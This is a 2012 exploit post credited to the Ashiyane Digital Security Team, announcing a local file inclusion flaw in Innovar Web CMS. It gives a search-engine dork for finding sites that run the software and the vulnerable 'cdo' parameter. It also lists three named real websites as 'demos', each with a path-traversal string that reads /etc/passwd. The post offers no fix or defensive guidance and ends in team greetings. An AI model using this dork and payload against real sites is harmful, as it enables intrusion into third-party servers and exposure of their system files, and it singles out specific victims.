-=-=-=-=-=- In The Name Of God -=-=-=-=-=- -------------------------------------------------------------------------------- @ Innovar Web CMS Local File Inclusion Vulnerbility -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- # Name:Innovar Web CMS Local File Inclusion Vulnerbility # Vendor: http://www.innovarweb.com.ar/ # Date: 2012-10-22 # Author: Ashiyane Digital Security Team # Thanks to: 1337day.com,cxsecurity.com,packetstormsecurity.org # Home: www.ashiyane.org/forums/ -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [+] Dork: intext:"Desarrollado por Innovar Web" -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [+] Vulnerability ~> [+] Vulnerability: http://127.0.0.1/path/index.php?cdo=[Include] [+] Demo(s) : [+] http://www.westingcapitalinc.com/index.php?cdo=../../../../../../etc/passwd [+] http://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd [+] http://www.ojalatesirva.com.ar/interior/index.php?cdo=../../../../../../etc/passwd =========================================================================== @ Gr33tz: @ Ashiyane Members : @ Behrooz_Ice,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04 @ PrinceOfHacking,elvator,unique2world,HidDeEn,Encoder,N4H,Classic,Zend @ Angel--D3m0n,Azad&#8482;,HashoR,Pr0grammer,Unline And All Ashiyane Bug ResearcherS =========================================================================== ASHIYANE DIGITAL SECURITY TEAM Persian Gulf F0r Ever WE LOVE IRAN <<./By MojiRider >>